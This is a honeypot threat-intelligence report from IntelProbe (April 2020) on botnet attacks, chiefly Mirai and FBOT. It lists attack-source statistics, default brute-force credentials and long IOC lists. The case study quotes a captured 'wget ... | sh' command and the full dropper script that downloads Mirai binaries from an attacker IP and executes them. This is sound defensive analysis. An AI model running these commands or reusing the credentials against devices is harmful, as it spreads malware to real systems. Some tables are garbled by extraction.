IntelProbe HoneyPot Rapor ENG - ecs-org.eu€¦ · HoneyPot Network Report About Us IntelProbe is a Turkish company specialized in the areas of next generation defense technologies,

HoneyPot NetworkCyber Intelligence Report

4 April 2020

IntelProbe ® | www.intelprobe.com.tr | HoneyPot Network Report | 1

HoneyPot Network Report

About UsIntelProbe is a Turkish company specialized in the areas of next generation defense technologies, cyber threat intelligence and cyber security solutions.

IntelProbe developes solutions in its R&D center to provide up to date and high technology integrated solutions for near future needs while aiming to expand as the sector grows. Consequently, for this purpose IntelProbe has set out its journey by integrating the Technologies and framework of four companies in the field of defense industry, software and cyber security and values the search for further solutions through joint studies with its partners.

IntelProbe provides solutions to both private and public institutions and organizations across the world while performing joint studies with national and international institutions to meet current security and technology needs as well as to maintain its long-term growth strategy.

IntelProbe is a result of more than twenty years of experience and besides its existing Ankara and Istanbul offices, it expands its global competence by branching out internationally. IntelProbe offers advanced technology-based detection and mission system integrations in the areas of “Data Security”, “Data Analytics”, “Tactical and Strategic Cyber Defense and Intelligence” as well as continuing to perform studies in other areas including “Geographical Infrastructure Systems” and “Augmented Reality Based Simulations”.

IntelProbe conducts studies through the nearby geography and especially in Turkey on the qualitative and scale development of big data and artificial intelligence based cyber threat intelligence projects.

With its wide ecosystem, ability to develop software and hardware based products and its domestic and international network, IntelProbe is the primary choice in both public and private sectors. The company works to strengthen its position as an expert company with the knowledge, experience, talent and technology transfers that it provides.

IntelProbe has the absolute determination to continue to grow each passing day with the goal of creating powerful security solutions for secure informatics infrastructures.

This report was produced as a result of examining attacks on the "IntelProbe Honeypot Network". The first HoneyPot studies were published by Clifford Stoll in 1990 in “The Cuckoo's Egg” This concept, which has preserved its popularity and functionality until today, is explained as traps that may attract the attention of attackers.

The advantages of HoneyPot systems include the following considerations.

• It offers the ability to track and learn the attackers' actions and behavior while on the go.

• HoneyPot provides the opportunity to collect information about attack vectors, malware and exploits.

• It offers the opportunity to create and analyze profiles of attackers.

• HoneyPot offers the opportunity to keep attackers away from real systems by spending time on fake systems.

• Offers the ability to understand, predict and defend possible attacks

“HoneyPot Network Cyber Intelligence Report”


Executive Summary

A lot of valuable information is obtained with HoneyPots, which are the pitfalls that offer the ability to monitor and learn the movement and behavior of the attackers while they are in action, which can attract attention. It was seen that a significant part of the attacks detected with IntelProbe Honeypot Network was carried out by botnets. It was also analyzed in attacks on the HoneyPot network system, where botnets such as MIRAI and FBOT were detected, also through attacks on the TOR network.

It was observed that the sources of attacks targeting especially the public sector match the Tor Exit Nodes. Many attacks were found to originate from the Far East.

We analyzed that, usernames and passwords used during brute force attacks, it is thought that most of the relevant are simple password policies and network devices with default configuration are targeted. All relevant data and information can be found in the findings section of the report.


Recorded Future ®| www.recordedfuture.com | FR-2020-0312 | 2

Architecture

The IntelProbe HoneyPot network system is a trap system with numerous services and scenarios available on local networks and the Internet. Services such as SSH, Telnet, SMTP and FTP, located on multiple anonymous and target-defined systems, are up-to-date with current technologies.

Log information on all HoneyPot systems are collected and analyzed centrally. Alarms are created and necessary actions are taken as a result of these alarms with the rules and correlations on the system





Key Findings

Taiwan27%

North Korea16%

Vietnamese11%

Brazil10%

China9%

USA7%

Russia6%

Hong K ong6%

Turkey4%

Indiav4% Information Tech.

18%

Finance18%

Public17%

Tourism17%

Production16%

Merchandising14%

Image 1: Attack points by IP Location information

Image2: Attack points by country Image 3: Ranking of the most attacked sectors

Table 1: Attack Sources (TOP 10)

IP Adresi CN Attack Type Attack Time Range193.56.28.30223.17.167.184121.141.105.120122.116.115.56220.132.247.20249.213.194.105114.35.27.13045.148.10.61114.35.4.4259.120.224.22

Open Relay (SMTP)BruteForce / FBOTBruteForce / FBOTBruteForce / FBOTBruteForce (FTP)Brute Force (FTP)Brute Force (Telnet)Buffer OverflowBrute Force (Telnet)BruteForce / MIRAI

2020/02/05 17:41:28 - 2020-02-06 16:01:512020-02-09 14:24:28 - 2020-03-26 13:56:302020-03-02 01:34:21 - 2020-03-24 17:54:232020-02-22 17:13:29 - 2020-03-23 16:34:222020-02-13 12:13:37 - 2020-02-13 15:55:012020-02-10 18:00:29 - 2020-03-11 02:21:222020-02-23 06:10:28 - 2020-03-19 22:42:262020-03-16 12:10:33 - 2020-03-19 00:44:112020-02-29 18:16:39 - 2020-03-23 08:44:382020-02-29 06:36:09 - 2020-03-15 01:35:13

UKHKKRTWTWTWTWNLTWTW




Imagel 4: Usernames and passwords attempts

Table 2: Usernames and passwords used in Brute Force attacks (TOP 10)

Table 3: Command attempts used in attacks (TOP 10)

admin - 123419%

root - aquario 17%

admin - admin 17%

root - root 9%

guest - 12345 9%

root - admin 7%

root - vizxv 6%

root - xc3511 6%

user - user 6%

Root - 7ujMko0vizxv4%

admin - 1234

root - aquario

root - root

admin - admin

guest - 12345

root - admin

root - vizxvroot - xc3511

user - user

Root - 7ujMko0vizxv

Username %

rootadminguestdefaultsupervisorusersupportAdministratorubntservice

QUITAUTH LOGINEHLO ADMINiptables -F\\x03\\x00\\x00/*\\xe0\\x00\\x00\\x00\\x00\\x00Cookie: mstshash=AdministrGET / HTTP/1.0RSET/bin/busybox FBOTAUTH TLSHELP

43,6717,306,316,313,293,292,631,531,331,33

Password %

system1234admin12345password7ujMko0adminuser123456888888666666

7,166,433,356,313,292,542,462,412,091,57

Username/Password %

admin - 1234root - aquarioroot - rootadmin - adminguest - 12345root - adminroot - vizxvroot - xc3511user - userRoot - 7ujMko0vizxv

7,166,433,356,313,292,542,462,412,091,57

%

33,5619,349,626,314,292,382,111,291,031,01

Command



Technical Analysis / Case Study

Time Range

Payload

StatusThreatVirusTotalSize

Hash

URL Domain IP

194.180.224.2492020-03-04 04:47:332020-03-11 20:38:30

wget http://a.deadnig.ga/muck.sh -O - | sh

Online (IP)Malware Download17/571.02 KBaa6bf1f902a04a34be82a87675dce2976a12f6a4766f14bfb978575e216bc36b

It is seen that the above suspicious payload, which is among the detected attempts, tries to download a script file named “muck.sh” to the target using the “wget” command over a remote server. The script that is trying to download was also try to run with the “-O - | sh” command.

It has been observed that the working script file requests 7 different URLs within 1 domain name and communicates with 13 IP addresses in total.

http://a.detadnig.ga/rispek.mipshttp://a.deadnig.ga/rispek.arm7http://a.deadnig.ga/rispek.mipselhttp://a.deadnig.ga/rispek.arm5http://a.deadnig.ga/rispek.arm6http://a.deadnig.ga/rispek.arm4http://a.deadnig.ga/rispek.x86_64

194.180.224.24917.57.144.11723.12.149.59

23.223.201.2617.248.131.20117.253.7.204

17.248.131.20017.248.131.19817.248.131.17317.248.185.18

17.248.131.13617.248.185.39

17.248.185.132

a.deadnig.ga

IP

Hash

URL Domain IP

17/57



Recorded Future ®| www.recordedfuture.com | FR-2020-0312 | 2Recorded Future ®| www.recordedfuture.com | FR-2020-0312 | 2


The content desired to be downloaded and run as a result of the realized access is as follows.

#! /bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd / rm -rf rispek* wget http://194.180.224.249/rispek.x86_64 -O rispek1; chmod +x rispek1; ./rispek1 wget http://194.180.224.249/rispek.arm4 -O rispek2; chmod +x rispek2; ./rispek2 wget http://194.180.224.249/rispek.arm7 -O rispek3; chmod +x rispek3; ./rispek3 wget http://194.180.224.249/rispek.mipsel -O rispek4; chmod +x rispek4; ./rispek4 wget http://194.180.224.249/rispek.arm5 -O rispek5; chmod +x rispek5; ./rispek5 wget http://194.180.224.249/rispek.mips -O rispek6; chmod +x rispek6; ./rispek6 wget http://194.180.224.249/rispek.arm6 -O rispek13; chmod +x rispek13; ./rispek13 curl http://194.180.224.249/rispek.arm6 -o rispek14; chmod +x rispek14; ./rispek14 curl http://194.180.224.249/rispek.x86_64 -o rispek7; chmod +x rispek7; ./rispek7 curl http://194.180.224.249/rispek.arm4 -o rispek8; chmod +x rispek8; ./rispek8 curl http://194.180.224.249/rispek.arm7 -o rispek9; chmod +x rispek9; ./rispek9 curl http://194.180.224.249/rispek.mipsel -o rispek10; chmod +x rispek10; ./rispek10 curl http://194.180.224.249/rispek.arm5 -o rispek11; chmod +x rispek11; ./rispek11 curl http://194.180.224.249/rispek.mips -o rispek12; chmod +x rispek12; ./rispek12 rm -rf rispek*

With the script to be run, it is aimed to delete the existing files that start with “rispek”.Then, it was aimed to download the ones prepared by the attacker, give the authority to run.

As a result of the examinations made by IntelProbe researchers, it was seen that the related files were prepared to infect the network devices. The associated bot attack is thought to be the MIRAI variation.

Image 5: The IP address locations realized appear on the USA.



Indicators of compromise

1a21979b188ba72e554fd452bde7b1cb40472c8dfe7228bbb7b16fd740a1c608

fd203de0c44b07d5b6fe31dc613ddac20e03d8c7fe593201ad099444aacbda96

47f1ebc4013f0e13feeea6ed45bdca089e60331a0ebf4ca0a1f04faa3fc30f8a

330be7c0813460f9bfcda1f60b36af2c6db7258e4f21c4392683b92528394a33

4014b538ad32bb1ab66f8efa0856fcd718d224be8733ce4c3fff16989c480c4e

bf7006f78ce02de1aabaf97ab7288ab071a97765ed152bec6ce388eb66a91413

62f872698a133265f21754f023f049d5e54a3279ac9376aa24fefe4ee75bcd82

Attackers want to remain anonymous in targeted attacks. The table below shows the Tor exit nodes, IP addresses and action time range used in an attack on a public institution's HoneyPot system.


Attacks from the TOR Network

Tor Exit Node IP Action Range 9971F51A3274758B5C59E1D6580ED2C13E13CBEC 185.220.100.254 2020-02-13

23:08:28 654B0C3A77FE8A8AF34C43BEA9297C1083E821C8 51.158.147.12 2020-02-13

23:10:38 85C8D89DC303DD8F0D566677FCA8BA6A58A2ACAD 193.169.145.66 2020-02-13

23:11:56 6EEF8446BF9D43DA7F7D8505BDFC49BBE64BF822 23.129.64.205 2020-02-13

23:10:38 3994E734DCD794479D1A60F4ABD3FC91CAA395EE 178.165.72.177 2020-02-13

23:09:25 0ED4CA8A8E6CE2D28D6D23B20815AE3982646FCB 104.244.72.115 2020-02-13

23:07:58 01729F10A81DDD8A92D770B2133082EB56C75E26 192.42.116.26 2020-02-13

23:08:29 7430F66B1CABCB52D583C9C3035EE19A3E87A23E 192.42.116.26 2020-02-13

23:08:29 0485027A0A349D454D978F6C1CECDD29EA17769A 192.42.116.17 2020-02-13

23:08:40 6F4E9FD00D4251D98BE96FB1AA546FE34676A95B 162.247.74.206 2020-02-13

23:11:29 DD808ECE4F2E24F377CBE11E335ECDA196FE3B78 185.207.139.2 2020-02-13

23:10:53 906DCB390F2BA987AE258D745E60BAAABAD31DE8 185.220.101.33 2020-02-13

23:09:13 C545ED3BE029B226D74B3F798235951D2FEEE3E1 212.47.229.4 2020-02-13

23:09:44 99B4F5757DC27182E5282DD44DC2182A9BBF6E9C 104.244.76.245 2020-02-13

23:08:02 47C42E2094EE482E7C9B586B10BABFB67557030B 185.220.101.34 2020-02-13

23:11:40 7D921363817BE896B5462E90033DA937BEF7CE3F 185.220.101.73 2020-02-13

23:09:33 5D96F61FED26C299093B4B0409ED3A18765A6DB2 217.170.205.107 2020-02-13

23:11:05 F8E9C0C3A4B61E7599AA7A23D7ADE77E5BAB2663 185.220.101.77 2020-02-13

23:09:56 96A116FE3662C70E02084C7B6306B88C5CA9E3F6 142.44.156.132 2020-02-13

23:08:48


It has been seen that important information such as username and password leaked by institutions or providers are used by attackers and this information is tried on HoneyPots. As a result of the examinations made, it has been observed that the leaked password information of the institutions was tried on the services such as FTP or SMTP.

The detected IOC information is as follows. This information has been revealed as a result of analysis of attacks on the IntelProbe HoneyPot network. It has been determined that most of the attacks are targeted to the public sector.

• http://123.125.114.144• http://149.129.139.217:23• http://149.129.176.239:23• http://149.202.153.56• http://149.56.122.12• http://157.230.62.208• http://159.89.40.246• http://188.209.52.152• http://198.12.97.93• http://208.67.1.42• http://208.73.203.9• http://47.254.216.199:23• http://47.254.242.167:23• http://47.74.68.200:23• http://47.91.108.129:23• http://51.254.209.163

• http://67.205.146.114• http://96.41.72.82• http://a.deadnig.ga• 194.180.224.249• 17.57.144.117• 23.12.149.59• 23.223.201.26• 17.248.131.201• 17.253.7.204• 17.248.131.200• 17.248.131.198• 17.248.131.173• 17.248.185.18• 17.248.131.136• 17.248.185.39 • 17.248.185.132


Detection of Leaked Usernames and Passwords

IOC


The detected MIRAI IOC information is as follows. This information has been revealed as a result of analysis of attacks on the IntelProbe HoneyPot network.

MIRAI Botnet IOC

102.182.122.36 103.102.123.131 103.116.24.183 103.120.118.30 103.124.86.25 103.134.130.12 103.195.38.59 103.219.208.187 103.236.193.141 103.245.103.182 103.69.46.202 103.99.38.8 104.1.33.76 104.162.26.90 106.0.37.137 106.0.37.166 106.104.34.194 106.105.192.224 106.105.208.126 106.115.139.202 107.15.27.16 107.181.59.84 109.162.38.18 109.206.131.43 109.63.243.229 109.99.230.5 111.199.126.199 111.91.119.243 112.118.207.138 112.163.76.63 112.167.40.248 112.186.3.82 112.218.31.82 112.251.37.32 112.95.210.99 113.161.206.68 113.161.80.246 113.162.157.152 113.162.196.22 113.163.207.234 113.163.215.66 113.172.197.145 113.172.248.8 113.172.37.215 113.174.172.208 113.175.222.191 113.175.75.32 113.176.230.67 113.177.80.198 113.177.80.220 113.178.104.218 113.182.142.11 113.182.151.132 113.182.180.87 113.182.201.254 113.183.142.106 113.183.19.73 113.187.93.26 113.188.46.65 113.22.246.245 113.23.109.249 113.240.153.69 113.255.226.246 113.255.2.30 113.61.204.152 114.105.176.230 114.156.134.141 114.201.164.116 114.32.145.101 114.32.80.230 114.33.204.22 114.33.70.44 114.34.194.111 114.35.12.44 114.35.140.52 114.35.145.230 114.35.147.130 115.133.127.153 115.165.204.3 115.207.118.230 115.49.105.75 115.49.250.64 115.53.179.221 115.55.0.51 115.55.219.246 115.56.120.146 115.59.71.182 115.72.120.103 115.72.140.40 115.72.210.39 115.72.93.239 115.74.45.9 115.76.122.183 115.76.213.218 115.76.75.117 115.77.138.40 115.77.171.186 115.77.172.162 115.77.245.101 115.96.11.211 115.96.204.70 115.99.247.75 116.102.197.6 116.102.40.28 116.103.207.187 116.105.170.127 116.105.194.245 116.105.99.174 116.106.121.123 116.108.28.156 116.109.163.133 116.110.253.197 116.241.15.108 1.165.108.42 116.73.196.224 116.75.43.27 117.63.48.141 117.94.134.46 118.232.195.228 118.232.236.116 118.232.236.14 118.232.97.18 118.34.214.195 118.36.121.190 118.36.214.221 118.38.124.88 118.39.154.151 118.42.176.54 118.42.220.29 118.44.211.168 118.47.45.9 118.68.210.126 118.71.142.78 118.99.137.75 119.149.206.246 119.193.219.16 119.197.194.145 119.237.95.178 119.76.161.36 119.77.132.75 119.77.165.252 120.234.61.130 120.29.140.164 121.132.11.3 121.135.94.128 121.136.178.98 121.150.154.168 121.150.9.180 121.152.215.98 121.153.51.215 121.154.62.109 121.158.170.67 121.159.177.64 121.162.225.226 121.164.60.230 121.172.184.118 121.173.210.73 121.179.179.46 121.180.188.110 121.185.228.109 121.236.24.187 121.254.124.108 12.150.79.116 121.61.152.157 121.61.153.161 121.61.159.159 122.100.124.236 122.11.135.220 122.116.14.192 122.116.58.35 122.117.137.178 122.117.152.28




122.117.177.97 122.117.84.169 122.117.84.44 122.117.91.1 122.128.168.10 122.165.205.189 122.223.16.102 123.0.200.95 123.0.220.177 123.10.130.40 123.10.153.245 123.10.241.145 123.112.23.72 123.135.226.218 123.14.250.101 123.16.204.119 123.18.192.116 123.192.32.86 123.194.141.196 123.194.96.228 123.201.108.109 123.20.147.231 123.205.163.89 123.205.171.26 123.21.226.118 123.22.191.91 123.22.75.175 123.23.36.149 123.23.93.41 123.240.43.59 123.240.73.236 123.241.126.60 123.28.129.115 123.28.130.176 123.4.45.241 124.123.41.227 1.241.250.120 124.155.50.166 124.171.15.60 124.207.242.232 1.243.143.233 124.40.247.147 1.244.96.133 125.121.112.148 125.128.229.70 125.132.98.52 125.133.13.201 125.140.14.201 125.142.187.226 125.179.93.222 125.227.99.117 125.42.192.24 125.44.200.74 125.44.23.176 125.45.60.2 130.204.47.199 130.204.84.161 1.34.110.215 14.160.210.252 14.162.120.176 14.162.39.133 14.164.87.162 14.168.45.139 14.169.164.237 14.169.238.35 14.169.240.199 14.173.182.21 14.173.237.233 14.173.239.169 14.183.186.25 14.183.195.189 14.183.207.97 14.184.13.104 14.184.247.56 14.185.186.179 14.186.191.132 14.186.3.73 14.186.7.121 14.187.10.180 14.187.141.220 14.187.158.131 14.187.197.126 14.187.202.30 14.187.234.144 14.187.243.40 14.187.75.200 14.187.94.183 14.191.174.34 14.194.231.65 14.207.56.7 14.211.69.101 14.227.148.105 14.227.159.13 14.227.93.243 14.228.18.64 14.230.130.252 14.230.138.233 14.230.199.151 14.234.13.66 14.234.163.3 14.237.197.162 14.244.142.174 14.245.244.222 14.248.104.243 143.137.193.37 14.41.29.193 14.42.37.45 14.52.106.157 151.177.48.17 151.237.174.125 1.52.123.165 1.52.203.42 1.52.205.188 1.52.209.138 1.52.210.23 1.52.244.63 1.53.122.22 1.53.162.120 153.166.189.58 153.183.164.183 153.192.3.214 1.53.224.211 1.53.56.242 1.53.89.1 1.55.189.144 158.174.137.99 163.21.9.20 163.24.111.126 163.27.217.50 164.163.44.120 168.181.253.56 169.0.137.145 169.0.180.82 170.84.69.2 171.226.101.133 171.229.231.229 171.229.242.180 171.231.123.188 171.232.168.54 171.235.222.106 171.239.11.117 171.239.239.126 171.239.239.170 171.245.251.240 171.245.253.192 171.245.91.39 171.246.135.109 171.247.246.140 171.247.55.76 171.247.96.218 171.248.61.160 171.248.88.142 171.248.92.68 171.251.123.79 171.38.148.156 171.38.149.183 171.38.193.111 171.38.193.228 171.4.0.205 171.97.15.148 173.25.2.198 175.123.135.199 175.136.148.143 175.136.211.108 175.137.184.59 175.138.55.226 175.182.175.193 175.182.180.248 175.37.231.132 175.9.39.40 176.106.144.246 176.212.107.163



176.67.12.154 177.42.188.130 177.89.4.168 178.151.83.166 178.165.73.143 179.186.127.18 180.145.24.44 180.218.212.21 180.38.68.6 180.68.89.238 181.164.130.86 182.115.174.65 182.116.54.134 182.117.94.252 182.117.94.58 182.126.193.89 182.126.216.205 182.127.37.216 182.155.103.82 182.155.153.190 182.155.225.53 182.155.41.185 182.165.124.205 182.53.41.242 182.74.69.251 183.104.89.237 183.106.135.51 183.108.165.57 183.109.99.8 183.80.124.184 183.90.87.186 184.82.101.251 184.82.98.123 185.105.36.208 185.59.124.48 186.235.216.177 186.96.100.75 187.103.10.145 187.120.99.6 187.189.39.38 187.59.232.60 188.148.10.130 188.166.71.116 188.243.165.222 188.68.10.65 189.90.33.17 190.111.224.87 190.218.236.131 197.159.134.166 197.51.249.138 203.140.148.238 203.218.8.46 203.70.224.193 207.164.111.248 210.178.69.211 210.179.37.234 210.179.39.121 210.179.39.26 210.209.154.113 210.209.168.31 210.223.112.131 210.99.33.151 211.20.230.136 211.211.38.210 211.227.173.132 211.230.209.231 211.236.140.73 211.248.111.216 211.250.82.70 211.57.26.120 212.11.108.98 217.26.173.42 218.147.221.223 218.148.232.221 218.149.14.228 218.191.184.225 218.32.118.21 218.35.54.120 219.133.80.146 219.154.152.101 219.155.142.203 219.155.201.62 219.155.211.0 219.155.211.176 219.157.169.102 219.240.110.112 219.74.192.93 219.77.75.235 219.79.167.122 219.91.28.137 220.116.197.246 220.119.52.50 220.120.38.57 220.124.89.21 220.127.171.15 220.132.110.39 220.132.219.77 220.132.237.227 220.133.90.76 220.134.100.231 220.134.109.87 220.134.160.18 220.134.30.198 220.135.54.197 220.77.110.57 220.77.136.104 220.82.165.202 220.84.16.56 220.87.139.34 220.88.186.227 220.90.174.38 220.90.48.181 220.93.234.212 220.94.12.47 221.14.125.243 221.158.47.157 222.100.165.32 222.103.140.57 222.108.178.74 222.110.224.142 222.118.109.24 222.118.213.242 222.121.148.219 222.141.45.96 222.214.54.4 222.236.122.151 223.16.17.254 223.212.39.11 223.241.246.20 24.232.213.124 24.244.139.149 27.105.194.150 27.223.144.91 27.3.117.134 27.3.44.246 27.3.44.30 27.69.195.171 27.74.21.135 27.74.92.113 27.75.143.30 27.76.202.159 27.77.50.237 27.77.58.2 27.77.85.116 27.78.171.179 31.211.122.18 31.40.98.210 36.233.65.203 36.39.62.111 36.55.19.145 39.65.151.128 41.184.122.182 41.41.81.72 42.112.147.52 42.112.162.204 42.112.162.31 42.112.236.192 42.113.149.192 42.113.209.79 42.113.90.254 42.115.163.73 42.116.64.204 42.116.65.178 42.117.17.119 42.117.229.157 42.117.230.61 42.118.220.215 42.118.250.111 42.119.180.53 42.225.198.32 42.225.230.130 42.227.167.126



42.227.185.174 42.229.243.173 42.230.208.160 42.234.86.150 42.239.182.27 43.228.93.198 45.113.156.219 45.171.126.11 45.173.232.135 45.176.124.156 45.232.5.10 45.238.208.3 45.248.65.101 45.251.58.100 49.158.244.26 49.159.93.196 49.207.183.96 5.14.204.237 5.227.136.53 5.3.161.101 58.114.124.182 58.122.118.15 58.122.118.17 58.16.10.59 58.186.23.235 58.227.118.59 58.71.199.155 59.102.172.134 59.120.224.22 59.126.136.248 59.126.151.73 59.126.158.129 59.126.183.205 59.151.208.35 59.2.35.120 59.25.20.42 59.25.233.21 59.25.95.98 59.30.47.156 59.6.137.47 59.9.117.242 60.19.80.194 60.209.197.82 60.248.125.33 60.248.176.60 60.250.235.177 60.254.2.104 60.254.8.131 60.254.93.167 60.50.163.228 60.9.127.9 61.113.199.162 61.254.68.247 61.52.118.190 61.65.45.20 61.79.233.80 61.80.40.246 61.81.4.142 61.83.185.153 61.84.247.221 61.85.218.245 62.151.0.146 68.173.176.20 68.78.27.58 72.20.67.247 73.80.87.4 77.109.50.75 77.121.100.14 77.42.72.251 77.42.80.104 77.45.217.108 78.188.239.248 78.189.16.133 78.37.126.47 79.132.95.242 80.184.233.154 82.251.57.129 83.226.108.113 83.227.105.53 83.227.111.183 84.217.220.100 84.217.9.42 84.219.136.173 84.219.223.121 84.55.21.228 85.105.203.113 85.225.26.223 85.228.104.245 85.228.149.126 85.230.16.125 86.42.7.68 88.247.68.211 88.249.120.167 88.249.202.119 88.253.23.139 89.208.30.63 91.148.47.125 91.235.198.211 94.180.84.5 94.9.13.31 95.220.227.193 95.244.130.213 95.86.38.77 96.37.48.211 96.84.11.217 99.29.225.20



FBOT Botnet IOCThe detected FBOT IOC information is as follows. This information has been revealed as a result of analysis of attacks on the IntelProbe HoneyPot network.

102.132.39.76 102.182.210.175 103.101.108.188 103.114.249.186 103.118.5.11 103.120.118.121 103.120.118.154 103.120.118.19 103.124.206.146 103.138.26.11 103.138.26.15 103.138.26.9 103.147.98.133 103.192.204.19 103.197.152.31 103.20.182.134 103.20.183.63 103.217.135.246 103.218.110.142 103.219.45.154 103.227.119.108 103.227.119.197 103.228.143.156 103.228.251.131 103.248.211.49 103.25.1.38 103.251.82.58 103.53.235.57 103.68.176.61 103.74.72.233 103.88.57.88 103.89.234.81 103.89.63.169 104.175.105.220 106.105.138.85 106.105.141.239 106.105.75.43 106.105.84.69 106.105.85.71 106.111.8.87 106.1.185.161 106.1.199.96 106.1.5.148 106.51.153.187 106.51.2.20 106.57.0.101 108.2.66.129 109.160.30.253 109.200.234.64 109.204.186.99 109.206.131.43 109.210.193.132 109.225.118.24 109.241.235.82 109.248.241.29 109.248.241.38 109.248.241.44 109.248.241.45 109.87.82.211 110.232.252.120 110.33.146.235 110.78.157.206 110.93.240.197 1.11.157.111 111.165.248.185 111.165.248.45 111.175.13.41 111.240.33.34 111.241.115.38 111.241.192.197 111.241.193.72 111.241.194.174 111.242.10.12 111.243.253.111 111.244.5.162 111.246.3.76 111.250.138.25 111.251.171.155 111.251.59.45 111.251.70.142 111.252.6.85 111.254.9.251 111.255.14.180 111.255.18.219 111.34.65.88 112.105.3.65 112.105.53.99 112.105.75.191 112.115.133.26 112.118.152.202 112.118.198.154 112.118.40.40 112.118.46.17 112.118.61.98 112.118.63.183 112.118.80.177 112.119.161.199 112.119.192.219 112.119.213.100 112.119.220.215 112.119.25.247 112.119.75.91 112.119.79.252 112.120.136.65 112.120.137.172 112.120.152.16 112.120.161.65 112.120.175.117 112.120.247.1 112.145.106.40 112.159.64.190 112.160.159.245 112.160.195.167 112.160.241.49 112.165.254.102 112.165.85.164 112.166.168.86 112.168.167.109 112.168.242.68 112.171.49.44 112.172.6.167 112.173.181.32 112.186.91.105 112.187.190.194 112.187.85.244 112.193.29.109 112.22.23.149 112.234.170.152 112.84.21.70 112.87.28.177 113.178.220.13 113.196.212.51 113.21.74.0 113.22.158.190 113.22.66.119 113.23.98.10 113.25.175.229 113.252.189.216 113.253.178.44 113.253.230.215 113.254.113.241 113.254.205.14 113.254.214.77 113.254.224.154



113.254.226.62 113.254.31.189 113.254.54.201 113.255.13.102 113.255.227.18 113.255.232.83 113.255.233.56 113.255.237.221 113.255.241.135 113.255.241.247 113.255.35.78 113.26.245.36 114.200.63.18 114.206.114.197 114.220.25.229 114.223.182.33 114.223.190.40 114.233.24.35 114.24.205.9 114.250.110.39 114.26.198.21 114.26.42.44 114.26.63.12 114.32.126.232 114.32.144.49 114.32.188.65 114.32.225.231 114.32.227.128 114.32.232.6 114.32.240.153 114.32.240.51 114.32.26.127 114.32.29.225 114.32.35.234 114.32.37.21 114.32.52.91 114.32.56.22 114.32.80.7 114.32.99.152 114.33.103.246 114.33.121.37 114.33.127.212 114.33.134.85 114.33.142.190 114.33.19.140 114.33.196.148 114.33.200.118 114.33.213.49 114.33.216.186 114.33.237.208 114.33.24.63 114.33.251.181 114.33.33.238 114.33.66.63 114.33.75.63 114.33.85.169 114.33.99.106 114.34.101.136 114.34.176.208 114.34.183.92 114.34.215.91 114.34.228.167 114.34.234.239 114.34.26.204 114.34.97.99 114.35.128.182 114.35.131.1 114.35.131.132 114.35.143.219 114.35.146.203 114.35.155.188 114.35.157.208 114.35.199.35 114.35.208.252 114.35.243.155 114.35.245.173 114.35.27.130 114.35.32.157 114.35.4.42 114.35.60.42 114.35.7.29 114.35.87.8 114.36.65.57 114.37.127.140 114.37.217.159 114.38.28.67 114.39.161.96 114.39.6.26 114.40.157.15 114.40.161.50 114.40.182.146 114.40.184.131 114.40.185.99 114.40.188.138 114.40.241.39 114.41.1.72 114.41.204.160 114.41.8.241 114.43.148.52 114.43.4.206 114.44.202.177 114.45.77.58 114.46.130.159 114.46.226.167 114.47.112.176 114.47.113.69 114.47.115.207 114.47.118.222 114.47.124.92 114.75.17.42 115.165.203.205 115.165.211.235 115.20.203.210 115.22.120.207 115.221.236.93 115.23.181.3 115.23.49.179 115.41.142.181 115.49.200.195 115.49.211.37 115.49.213.7 115.49.239.245 115.49.249.180 115.49.77.128 115.50.41.72 115.52.163.68 115.54.169.91 115.55.233.246 115.55.72.124 115.56.117.77 115.58.135.220 115.59.77.30 115.61.11.78 115.63.26.149 115.72.145.129 115.72.71.142 115.73.6.164 115.74.0.151 1.160.44.105 1.160.51.184 116.102.129.178 116.106.116.52 116.110.219.49 116.110.49.89 116.111.209.193 116.111.227.137 1.161.118.116 116.113.99.171 116.120.219.19 1.161.212.252 1.161.35.210 1.161.43.137 1.162.206.49 1.163.206.174 1.163.213.232 116.48.102.7 116.48.105.144 116.48.23.67 116.48.37.22 116.48.66.250 116.49.181.169 116.49.206.233 116.49.36.198 116.49.3.65 1.165.15.176 1.165.214.222 1.165.88.32 116.72.168.240 116.72.24.127 116.72.34.182 116.72.44.71 116.73.120.102



116.74.107.176 116.74.179.153 116.77.146.61 116.86.180.206 116.88.82.23 116.89.87.137 1.169.67.35 116.97.213.109 1.170.3.190 1.170.88.14 1.171.174.197 1.171.254.189 117.205.239.35 1.172.127.216 117.216.169.71 117.2.190.241 1.172.230.108 117.242.175.138 117.247.151.8 117.254.205.130 1.173.137.93 1.174.12.241 1.174.4.84 1.174.90.186 1.174.90.8 1.175.120.181 1.175.126.179 1.175.133.56 1.175.147.90 1.175.169.241 1.175.69.56 117.94.162.70 117.95.60.112 118.100.39.225 118.141.150.217 118.150.152.187 118.161.131.65 118.161.137.27 118.161.139.204 118.163.182.157 118.163.251.142 118.166.254.241 118.167.162.58 118.168.142.157 118.168.198.76 118.170.121.97 118.170.168.70 118.170.225.93 118.170.33.203 118.171.153.97 118.179.64.203 118.189.9.67 118.232.162.15 118.232.96.163 118.233.12.35 118.254.146.67 118.33.166.81 118.33.212.200 118.34.214.13 118.36.21.28 118.39.155.211 118.39.213.194 118.40.122.21 118.42.173.28 118.43.177.73 118.46.20.24 1.186.138.236 118.68.195.102 118.71.31.245 118.71.89.241 119.115.237.71 119.193.100.249 119.196.119.21 119.196.186.182 119.196.219.149 119.198.153.190 119.203.160.66 119.207.164.221 119.236.116.82 119.236.136.54 119.236.161.203 119.236.183.18 119.236.186.211 119.236.194.19 119.236.194.231 119.236.242.49 119.236.253.115 119.236.37.180 119.236.75.186 119.237.134.245 119.237.176.18 119.237.192.42 119.237.35.152 119.237.75.171 119.237.76.187 119.237.9.45 119.246.59.57 119.247.82.74 119.252.161.122 119.74.93.135 119.98.17.221 120.50.11.182 121.121.121.156 121.128.251.112 121.130.178.166 121.132.132.3 121.132.75.214 121.133.62.234 121.141.105.120 121.147.200.110 121.148.122.219 121.148.125.167 121.148.91.44 121.150.165.226 121.150.20.211 121.150.9.180 121.151.254.176 121.152.127.68 121.153.51.215 121.154.252.102 121.160.188.26 121.162.72.45 121.165.150.156 121.166.185.199 121.168.140.184 121.174.195.146 121.175.228.204 121.180.188.110 121.180.207.250 121.186.107.247 121.188.27.54 121.189.161.163 121.189.175.200 121.191.65.199 121.226.200.94 121.227.253.39 121.46.70.144 121.46.84.12 122.100.111.105 122.100.211.107 122.110.82.107 122.116.0.18 122.116.115.56 122.116.232.151 122.116.43.99 122.116.59.139 122.117.100.182 122.117.109.74 122.117.115.186 122.117.115.7 122.117.11.71 122.117.121.32 122.117.13.244 122.117.142.243 122.117.175.90 122.117.202.199 122.117.217.172 122.117.223.176 